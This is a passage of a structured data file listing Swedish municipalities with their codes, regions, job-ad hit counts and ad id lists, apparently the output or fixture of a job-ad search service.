{'id': 'oezL_78x_r89', 'name': 'Skurup', 'type': 'municipality', 'code': '1264', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24606877', '24596998', '24590239', '24555159']},
{'id': 'P3Cs_1ZP_9XB', 'name': 'Sjöbo', 'type': 'municipality', 'code': '1265', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636041', '24624217', '24572488', '24562106', '24415688']},
{'id': 'autr_KMa_cfp', 'name': 'Hörby', 'type': 'municipality', 'code': '1266', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24647623', '24612427', '24598016', '24585770', '24576073', '24575956', '24388252']},
{'id': 'N29z_AqQ_Ppc', 'name': 'Höör', 'type': 'municipality', 'code': '1267', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24645789', '24611931', '24590427', '24580373', '24533802', '24524712', '24505268', '24495006']},
{'id': 'UMev_wGs_9bg', 'name': 'Tomelilla', 'type': 'municipality', 'code': '1270', 'region_code': '12',
     'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24629168', '24624712', '24621866', '24620688', '24616138']},
{'id': 'WMNK_PXa_Khm', 'name': 'Bromölla', 'type': 'municipality', 'code': '1272', 'region_code': '12',
     'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24648756', '24645758', '24645101', '24624728', '24584175', '24582959', '24513573', '24513519']},
{'id': 'najS_Lvy_mDD', 'name': 'Osby', 'type': 'municipality', 'code': '1273', 'region_code': '12',
     'region_name': 'Skåne län', 'hits': 6,
'ad_ids': ['24622447', '24612064', '24590486', '24584265', '24570384', '24484317']},
{'id': 'BN7r_iPV_F9p', 'name': 'Perstorp', 'type': 'municipality', 'code': '1275', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24644535', '24620267', '24590493']},
{'id': 'JARU_FAY_hTS', 'name': 'Klippan', 'type': 'municipality', 'code': '1276', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24649729', '24645668', '24630230', '24630125', '24627948', '24613981', '24602922', '24592988',
'24587696', '24576122']},
{'id': 'tEv6_ktG_QQb', 'name': 'Åstorp', 'type': 'municipality', 'code': '1277', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24646009', '24643953', '24611585', '24576459', '24572768', '24572674', '24488210']},
{'id': 'i8vK_odq_6ar', 'name': 'Båstad', 'type': 'municipality', 'code': '1278', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 6,
'ad_ids': ['24648777', '24642713', '24635648', '24546923', '24546926', '24437820']},
{'id': 'oYPt_yRA_Smm', 'name': 'Malmö', 'type': 'municipality', 'code': '1280', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 208,
'ad_ids': ['24650545', '24650520', '24650296', '24650097', '24650060', '24649950', '24648137', '24647586',
'24647704', '24647414']},
{'id': 'muSY_tsR_vDZ', 'name': 'Lund', 'type': 'municipality', 'code': '1281', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 94,
'ad_ids': ['24650438', '24650135', '24649589', '24648781', '24647011', '24647010', '24646930', '24646668',
'24645906', '24645894']},
{'id': 'Yt5s_Vf9_rds', 'name': 'Landskrona', 'type': 'municipality', 'code': '1282', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 13,
'ad_ids': ['24644146', '24644087', '24620576', '24620131', '24615771', '24573791', '24570452', '24567461',
'24540874', '24488640']},
{'id': 'qj3q_oXH_MGR', 'name': 'Helsingborg', 'type': 'municipality', 'code': '1283', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 75,
'ad_ids': ['24649269', '24648344', '24647195', '24645865', '24645699', '24644730', '24644155', '24643877',
'24643808', '24643688']},
{'id': '8QQ6_e95_a1d', 'name': 'Höganäs', 'type': 'municipality', 'code': '1284', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24634533', '24625162', '24623134', '24620349', '24576341']},
{'id': 'gfCw_egj_1M4', 'name': 'Eslöv', 'type': 'municipality', 'code': '1285', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24634664', '24629637', '24616790', '24608987', '24607603', '24603214', '24500582']},
{'id': 'hdYk_hnP_uju', 'name': 'Ystad', 'type': 'municipality', 'code': '1286', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24644036', '24625823', '24601172', '24599304', '24583510', '24574648', '24572130', '24511562',
'24511260', '24473915']},
{'id': 'STvk_dra_M1X', 'name': 'Trelleborg', 'type': 'municipality', 'code': '1287', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 18,
'ad_ids': ['24649417', '24645920', '24645911', '24640015', '24632826', '24630587', '24614377', '24608596',
'24608211', '24604616']},
{'id': 'vrvW_sr8_1en', 'name': 'Kristianstad', 'type': 'municipality', 'code': '1290', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 36,
'ad_ids': ['24649118', '24646547', '24645051', '24642902', '24639033', '24636394', '24636028', '24633571',
'24631796', '24623098']},
{'id': 'dLxo_EpC_oPe', 'name': 'Simrishamn', 'type': 'municipality', 'code': '1291', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636522', '24601452', '24550006', '24554806', '24502004']},
{'id': 'pCuv_P5A_9oh', 'name': 'Ängelholm', 'type': 'municipality', 'code': '1292', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 29,
'ad_ids': ['24648062', '24646052', '24645263', '24644897', '24643870', '24643102', '24642941', '24641238',
'24641268', '24635578']},
{'id': 'bP5q_53x_aqJ', 'name': 'Hässleholm', 'type': 'municipality', 'code': '1293', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 20,
'ad_ids': ['24645166', '24639356', '24625756', '24621467', '24614517', '24615762', '24610880', '24605726',
'24588549', '24597762']},
{'id': 'ocMw_Rz5_B1L', 'name': 'Kil', 'type': 'municipality', 'code': '1715', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 3, 'ad_ids': ['24649278', '24649261', '24492496']},
{'id': 'N5HQ_hfp_7Rm', 'name': 'Eda', 'type': 'municipality', 'code': '1730', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 8,
'ad_ids': ['24650359', '24649389', '24641459', '24638309', '24625958', '24625946', '24621089', '24601242']},
{'id': 'hQdb_zn9_Sok', 'name': 'Torsby', 'type': 'municipality', 'code': '1737', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 6,
'ad_ids': ['24649740', '24649672', '24641489', '24622563', '24547171', '24539768']},
{'id': 'mPt5_3QD_LTM', 'name': 'Storfors', 'type': 'municipality', 'code': '1760', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24605489', '24586914']},
{'id': 'x5qW_BXr_aut', 'name': 'Hammarö', 'type': 'municipality', 'code': '1761', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24612858', '24606451']},
{'id': 'x73h_7rW_mXN', 'name': 'Munkfors', 'type': 'municipality', 'code': '1762', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 1, 'ad_ids': ['24546455']},
{'id': 'xnEt_JN3_GkA', 'name': 'Forshaga', 'type': 'municipality', 'code': '1763', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24612399', '24602480']},
{'id': 'PSNt_P95_x6q', 'name': 'Grums', 'type': 'municipality', 'code': '1764', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24539560', '24566552']},
{'id': 'ymBu_aFc_QJA', 'name': 'Årjäng', 'type': 'municipality', 'code': '1765', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 1, 'ad_ids': ['24621703']},
{'id': 'oqNH_cnJ_Tdi', 'name': 'Sunne', 'type': 'municipality', 'code': '1766', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 4, 'ad_ids': ['24642867', '24622363', '24601636', '24590484']},
{'id': 'hRDj_PoV_sFU', 'name': 'Karlstad', 'type': 'municipality', 'code': '1780', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 49,
'ad_ids': ['24650860', '24645012', '24642294', '24641834', '24641215', '24641140', '24639997', '24637408',
'24635991', '24635497']},
{'id': 'SVQS_uwJ_m2B', 'name': 'Kristinehamn', 'type': 'municipality', 'code': '1781', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24649351', '24646057', '24617982', '24610610', '24535779']},
{'id': 'UXir_vKD_FuW', 'name': 'Filipstad', 'type': 'municipality', 'code': '1782', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 0, 'ad_ids': []},
{'id': 'qk9a_g5U_sAH', 'name': 'Hagfors', 'type': 'municipality', 'code': '1783', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 3, 'ad_ids': ['24632958', '24614330', '24504796']},
{'id': 'yGue_F32_wev', 'name': 'Arvika', 'type': 'municipality', 'code': '1784', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24626919', '24595432', '24594812', '24591333', '24532373']},
{'id': 'wmxQ_Guc_dsy', 'name': 'Säffle', 'type': 'municipality', 'code': '1785', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24649317', '24612041', '24574208', '24558595', '24381921']},
{'id': '4eS9_HX1_M7V', 'name': 'Vansbro', 'type': 'municipality', 'code': '2021', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 2, 'ad_ids': ['24602964', '24464433']},
{'id': 'FPCd_poj_3tq', 'name': 'Malung-Sälen', 'type': 'municipality', 'code': '2023', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 5, 'ad_ids': ['24649158', '24617319', '24608124', '24606239', '24544803']},
{'id': 'Nn7p_W3Z_y68', 'name': 'Gagnef', 'type': 'municipality', 'code': '2026', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 1, 'ad_ids': ['24649209']},
{'id': '7Zsu_ant_gcn', 'name': 'Leksand', 'type': 'municipality', 'code': '2029', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24640824', '24626128', '24571716']},
{'id': 'Jy3D_2ux_dg8', 'name': 'Rättvik', 'type': 'municipality', 'code': '2031', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24647031', '24647028', '24621580', '24595880']},
{'id': 'CRyF_5Jg_4ht', 'name': 'Orsa', 'type': 'municipality', 'code': '2034', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 6,
'ad_ids': ['24629334', '24608617', '24566875', '24561183', '24523938', '24488375']},
{'id': 'cZtt_qGo_oBr', 'name': 'Älvdalen', 'type': 'municipality', 'code': '2039', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24626713', '24621302', '24576229', '24576225']},
{'id': '5zZX_8FH_Sbq', 'name': 'Smedjebacken', 'type': 'municipality', 'code': '2061', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24645686', '24645204', '24593349']},
{'id': 'UGcC_kYx_fTs', 'name': 'Mora', 'type': 'municipality', 'code': '2062', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 12,
'ad_ids': ['24648097', '24624498', '24623037', '24623017', '24593694', '24587438', '24585960', '24572253',
'24548037', '24539727']},
{'id': 'N1wJ_Cuu_7Cs', 'name': 'Falun', 'type': 'municipality', 'code': '2080', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 33,
'ad_ids': ['24649195', '24646230', '24642403', '24640180', '24639093', '24637700', '24633983', '24628486',
'24622858', '24621668']},
{'id': 'cpya_jJg_pGp', 'name': 'Borlänge', 'type': 'municipality', 'code': '2081', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 22,
'ad_ids': ['24648735', '24645716', '24643955', '24640978', '24638705', '24634803', '24627930', '24624426',
'24620908', '24615413']},
{'id': 'c3Zx_jBf_CqF', 'name': 'Säter', 'type': 'municipality', 'code': '2082', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24646152', '24564510', '24638537']},
{'id': 'DE9u_V4K_Z1S', 'name': 'Hedemora', 'type': 'municipality', 'code': '2083', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 5, 'ad_ids': ['24617875', '24596329', '24595146', '24577346', '24518006']},
{'id': 'Szbq_2fg_ydQ', 'name': 'Avesta', 'type': 'municipality', 'code': '2084', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24643237', '24616778', '24612778', '24596510']},
{'id': 'Ny2b_2bo_7EL', 'name': 'Ludvika', 'type': 'municipality', 'code': '2085', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 15,
'ad_ids': ['24641952', '24640038', '24636562', '24636403', '24636399', '24636392', '24627279', '24618666',
'24608534', '24607134']},
{'id': 'GEvW_wKy_A9H', 'name': 'Ockelbo', 'type': 'municipality', 'code': '2101', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24647677', '24644885', '24636701']},
{'id': 'yuNd_3bg_ttc', 'name': 'Hofors', 'type': 'municipality', 'code': '2104', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 2, 'ad_ids': ['24643718', '24638172']},
{'id': 'JPSe_mUQ_NDs', 'name': 'Ovanåker', 'type': 'municipality', 'code': '2121', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24648796', '24626141', '24588647']},
{'id': 'fFeF_RCz_Tm5', 'name': 'Nordanstig', 'type': 'municipality', 'code': '2132', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 0, 'ad_ids': []},
{'id': '63iQ_V6F_REB', 'name': 'Ljusdal', 'type': 'municipality', 'code': '2161', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24624560', '24621604', '24604812']},
{'id': 'qk8Y_2b6_82D', 'name': 'Gävle', 'type': 'municipality', 'code': '2180', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 61,
'ad_ids': ['24648286', '24647457', '24645453', '24643119', '24641947', '24641752', '24641744', '24639606',
'24639443', '24638181']},
{'id': 'BbdN_xLB_k6s', 'name': 'Sandviken', 'type': 'municipality', 'code': '2181', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 11,
'ad_ids': ['24640410', '24639185', '24630586', '24610267', '24602729', '24587145', '24586302', '24578542',
'24576851', '24558652']},
{'id': 'JauG_nz5_7mu', 'name': 'Söderhamn', 'type': 'municipality', 'code': '2182', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 6,
'ad_ids': ['24640054', '24616079', '24614547', '24595502', '24503253', '24488845']},
{'id': 'KxjG_ig5_exF', 'name': 'Bollnäs', 'type': 'municipality', 'code': '2183', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 12,
'ad_ids': ['24647491', '24623857', '24623859', '24632941', '24631240', '24613810', '24612003', '24590238',
'24590045', '24548369']},
{'id': 'Utks_mwF_axY', 'name': 'Hudiksvall', 'type': 'municipality', 'code': '2184', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 26,
'ad_ids': ['24650607', '24650499', '24649045', '24648589', '24641095', '24641643', '24641698', '24647095',
'24646916', '24645190']},
{'id': 'swVa_cyS_EMN', 'name': 'Ånge', 'type': 'municipality', 'code': '2260', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 4, 'ad_ids': ['24639288', '24628389', '24610700', '24460553']},
{'id': 'oJ8D_rq6_kjt', 'name': 'Timrå', 'type': 'municipality', 'code': '2262', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 5,
'ad_ids': ['24649312', '24628388', '24620973', '24579351', '24504810']},
{'id': 'uYRx_AdM_r4A', 'name': 'Härnösand', 'type': 'municipality', 'code': '2280', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 14,
'ad_ids': ['24649670', '24634810', '24626434', '24626359', '24610521', '24604584', '24599753', '24595015',
'24588000', '24568790']},
{'id': 'dJbx_FWY_tK6', 'name': 'Sundsvall', 'type': 'municipality', 'code': '2281', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 58,
'ad_ids': ['24650752', '24650176', '24650130', '24650080', '24649995', '24649952', '24648358', '24646387',
'24645570', '24645032']},
{'id': 'yR8g_7Jz_HBZ', 'name': 'Kramfors', 'type': 'municipality', 'code': '2282', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 8,
'ad_ids': ['24649705', '24633992', '24633462', '24627834', '24587306', '24582328', '24574236', '24550420']},
{'id': 'v5y4_YPe_TMZ', 'name': 'Sollefteå', 'type': 'municipality', 'code': '2283', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 9,
'ad_ids': ['24649400', '24649380', '24642982', '24642980', '24634683', '24605190', '24588189', '24540108',
'24455320']},
{'id': 'zBmE_n6s_MnQ', 'name': 'Örnsköldsvik', 'type': 'municipality', 'code': '2284', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 23,
'ad_ids': ['24650185', '24649663', '24648830', '24648370', '24646067', '24643411', '24641851', '24634399',
'24632450', '24624920']},
{'id': 'Voto_egJ_FZP', 'name': 'Ragunda', 'type': 'municipality', 'code': '2303', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 0, 'ad_ids': []},
{'id': 'eNSc_Nj1_CDP', 'name': 'Bräcke', 'type': 'municipality', 'code': '2305', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 1, 'ad_ids': ['24615354']},
{'id': 'yurW_aLE_4ga', 'name': 'Krokom', 'type': 'municipality', 'code': '2309', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 0, 'ad_ids': []},
{'id': 'ppjq_Eci_Wz9', 'name': 'Strömsund', 'type': 'municipality', 'code': '2313', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 6,
'ad_ids': ['24646613', '24635521', '24634425', '24611237', '24608422', '24566029']},
{'id': 'D7ax_CXP_6r1', 'name': 'Åre', 'type': 'municipality', 'code': '2321', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 2, 'ad_ids': ['24587180', '24572426']},
{'id': 'gRNJ_hVW_Gpg', 'name': 'Berg', 'type': 'municipality', 'code': '2326', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 1, 'ad_ids': ['24626189']},
{'id': 'j35Q_VKL_NiM', 'name': 'Härjedalen', 'type': 'municipality', 'code': '2361', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 8,
'ad_ids': ['24650648', '24649337', '24648475', '24626268', '24615961', '24600435', '24565037', '24560583']},
{'id': 'Vt7P_856_WZS', 'name': 'Östersund', 'type': 'municipality', 'code': '2380', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 36,
'ad_ids': ['24650954', '24650862', '24648805', '24647118', '24640165', '24637613', '24634928', '24634409',
'24633737', '24631136']},
{'id': 'wMab_4Zs_wpM', 'name': 'Nordmaling', 'type': 'municipality', 'code': '2401', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24588012', '24494081']},
{'id': 'vQkf_tw2_CmR', 'name': 'Bjurholm', 'type': 'municipality', 'code': '2403', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 0, 'ad_ids': []},
{'id': 'izT6_zWu_tta', 'name': 'Vindeln', 'type': 'municipality', 'code': '2404', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 4, 'ad_ids': ['24610047', '24595064', '24585738', '24581311']},
{'id': 'p8Mv_377_bxp', 'name': 'Robertsfors', 'type': 'municipality', 'code': '2409', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24643631']},
{'id': 'XmpG_vPQ_K7T', 'name': 'Norsjö', 'type': 'municipality', 'code': '2417', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24577456']},
{'id': '7sHJ_YCE_5Zv', 'name': 'Malå', 'type': 'municipality', 'code': '2418', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24641503']},
{'id': 'gQgT_BAk_fMu', 'name': 'Storuman', 'type': 'municipality', 'code': '2421', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 3, 'ad_ids': ['24648927', '24612310', '24551322']},
{'id': 'VM7L_yJK_Doo', 'name': 'Sorsele', 'type': 'municipality', 'code': '2422', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24644670']},
{'id': 'tSkf_Tbn_rHk', 'name': 'Dorotea', 'type': 'municipality', 'code': '2425', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24648188', '24551059']},
{'id': 'utQc_6xq_Dfm', 'name': 'Vännäs', 'type': 'municipality', 'code': '2460', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24477260']},
{'id': 'tUnW_mFo_Hvi', 'name': 'Vilhelmina', 'type': 'municipality', 'code': '2462', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 3, 'ad_ids': ['24650955', '24646598', '24389476']},
{'id': 'xLdL_tMA_JJv', 'name': 'Åsele', 'type': 'municipality', 'code': '2463', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24635862', '24596209']},
{'id': 'QiGt_BLu_amP', 'name': 'Umeå', 'type': 'municipality', 'code': '2480', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 61,
'ad_ids': ['24651085', '24650971', '24649245', '24649034', '24648882', '24647955', '24647299', '24646501',
'24643021', '24642426']},
{'id': '7rpN_naz_3Uz', 'name': 'Lycksele', 'type': 'municipality', 'code': '2481', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 5,
'ad_ids': ['24650360', '24636787', '24624131', '24584326', '24461658']},
{'id': 'kicB_LgH_2Dk', 'name': 'Skellefteå', 'type': 'municipality', 'code': '2482', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 26,
'ad_ids': ['24650579', '24650245', '24647140', '24646439', '24644842', '24644817', '24641617', '24639673',
'24633366', '24629478']},
{'id': 'A5WX_XVo_Zt6', 'name': 'Arvidsjaur', 'type': 'municipality', 'code': '2505', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 0, 'ad_ids': []},
{'id': 'vkQW_GB6_MNk', 'name': 'Arjeplog', 'type': 'municipality', 'code': '2506', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 4, 'ad_ids': ['24650467', '24594796', '24505073', '24488974']},
{'id': 'mp6j_2b6_1bz', 'name': 'Jokkmokk', 'type': 'municipality', 'code': '2510', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24636604', '24629767']},
{'id': 'n5Sq_xxo_QWL', 'name': 'Överkalix', 'type': 'municipality', 'code': '2513', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24626297', '24562294']},
{'id': 'cUyN_C9V_HLU', 'name': 'Kalix', 'type': 'municipality', 'code': '2514', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 7,
'ad_ids': ['24650117', '24647684', '24617672', '24610596', '24598334', '24578326', '24549825']},
{'id': 'ehMP_onv_Chk', 'name': 'Övertorneå', 'type': 'municipality', 'code': '2518', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24615259', '24602364']},
{'id': 'dHMF_72G_4NM', 'name': 'Pajala', 'type': 'municipality', 'code': '2521', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 5,
'ad_ids': ['24613530', '24579678', '24421022', '24421085', '24421026']},
{'id': '6R2u_zkb_uoS', 'name': 'Gällivare', 'type': 'municipality', 'code': '2523', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 12,
'ad_ids': ['24650616', '24647793', '24646122', '24646015', '24645490', '24639665', '24631189', '24626915',
'24620850', '24613056']},
{'id': '14WF_zh1_W3y', 'name': 'Älvsbyn', 'type': 'municipality', 'code': '2560', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 1, 'ad_ids': ['24648879']},
{'id': 'CXbY_gui_14v', 'name': 'Luleå', 'type': 'municipality', 'code': '2580', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 54,
'ad_ids': ['24650277', '24649382', '24646536', '24646256', '24645408', '24645272', '24644929', '24642846',
'24640988', '24637961']},
{'id': 'umej_bP2_PpK', 'name': 'Piteå', 'type': 'municipality', 'code': '2581', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 21,
'ad_ids': ['24647791', '24646569', '24646410', '24642289', '24640981', '24629378', '24627010', '24615196',
'24614741', '24613745']},
{'id': 'y4NQ_tnB_eVd', 'name': 'Boden', 'type': 'municipality', 'code': '2582', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 6,
'ad_ids': ['24641061', '24625531', '24621825', '24593711', '24591832', '24547017']},
{'id': 'tfRE_hXa_eq7', 'name': 'Haparanda', 'type': 'municipality', 'code': '2583', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 3, 'ad_ids': ['24649761', '24641448', '24585171']},
{'id': 'biN6_UiL_Qob', 'name': 'Kiruna', 'type': 'municipality', 'code': '2584', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 18,
'ad_ids': ['24649230', '24637663', '24620869', '24616612', '24609586', '24609582', '24607586', '24605447',
'24604398', '24594403']},
{'id': 'y9HE_XD7_WaD', 'name': 'Aneby', 'type': 'municipality', 'code': '0604', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 2, 'ad_ids': ['24623297', '24579234']},
{'id': '91VR_Hxi_GN4', 'name': 'Gnosjö', 'type': 'municipality', 'code': '0617', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24628681', '24604131', '24590061', '24566659', '24558133']},
{'id': 'smXg_BXp_jTW', 'name': 'Mullsjö', 'type': 'municipality', 'code': '0642', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24643973', '24607032', '24606628', '24577681', '24537205']},
{'id': '9zQB_3vU_BQA', 'name': 'Habo', 'type': 'municipality', 'code': '0643', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 1, 'ad_ids': ['24579245']},
{'id': 'cNQx_Yqi_83Q', 'name': 'Gislaved', 'type': 'municipality', 'code': '0662', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 9,
'ad_ids': ['24613432', '24626013', '24612979', '24609415', '24604594', '24601733', '24599387', '24593831',
'24586269']},
{'id': 'zFup_umX_LVv', 'name': 'Vaggeryd', 'type': 'municipality', 'code': '0665', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24647651', '24633078', '24629708', '24550532', '24583814']},
{'id': 'KURg_KJF_Lwc', 'name': 'Jönköping', 'type': 'municipality', 'code': '0680', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 85,
'ad_ids': ['24651032', '24650982', '24650248', '24648832', '24647954', '24647864', '24644298', '24647107',
'24644341', '24644259']},
{'id': 'KfXT_ySA_do2', 'name': 'Nässjö', 'type': 'municipality', 'code': '0682', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 10,
'ad_ids': ['24644891', '24639953', '24633087', '24629181', '24621427', '24613566', '24610827', '24589332',
'24575224', '24528277']},
{'id': '6bS8_fzf_xpW', 'name': 'Värnamo', 'type': 'municipality', 'code': '0683', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 26,
'ad_ids': ['24641062', '24634862', '24632296', '24631196', '24627728', '24623817', '24622843', '24620357',
'24620014', '24614169']},
{'id': 'L1cX_MjM_y8W', 'name': 'Sävsjö', 'type': 'municipality', 'code': '0684', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 7,
'ad_ids': ['24640990', '24631381', '24612486', '24597187', '24581570', '24534133', '24468408']},
{'id': 'xJqx_SLC_415', 'name': 'Vetlanda', 'type': 'municipality', 'code': '0685', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 16,
'ad_ids': ['24643277', '24641529', '24640373', '24637057', '24628455', '24627538', '24627537', '24621685',
'24613356', '24609736']},
{'id': 'VacK_WF6_XVg', 'name': 'Eksjö', 'type': 'municipality', 'code': '0686', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 14,
'ad_ids': ['24637053', '24632911', '24615733', '24617245', '24609055', '24599160', '24597461', '24594324',
'24586118', '24585765']},
{'id': 'Namm_SpC_RPG', 'name': 'Tranås', 'type': 'municipality', 'code': '0687', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 10,
'ad_ids': ['24642284', '24641464', '24626417', '24623265', '24619248', '24618419', '24590114', '24499769',
'24476521', '24433907']},
{'id': '78cu_S5T_Pgp', 'name': 'Uppvidinge', 'type': 'municipality', 'code': '0760', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 3, 'ad_ids': ['24639253', '24617976', '24414696']},
{'id': 'nXZy_1Jd_D8X', 'name': 'Lessebo', 'type': 'municipality', 'code': '0761', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 1, 'ad_ids': ['24538499']},
{'id': 'qz8Q_kDz_N2Y', 'name': 'Tingsryd', 'type': 'municipality', 'code': '0763', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 4, 'ad_ids': ['24641348', '24624969', '24511207', '24491412']},
{'id': 'MMph_wmN_esc', 'name': 'Alvesta', 'type': 'municipality', 'code': '0764', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 5,
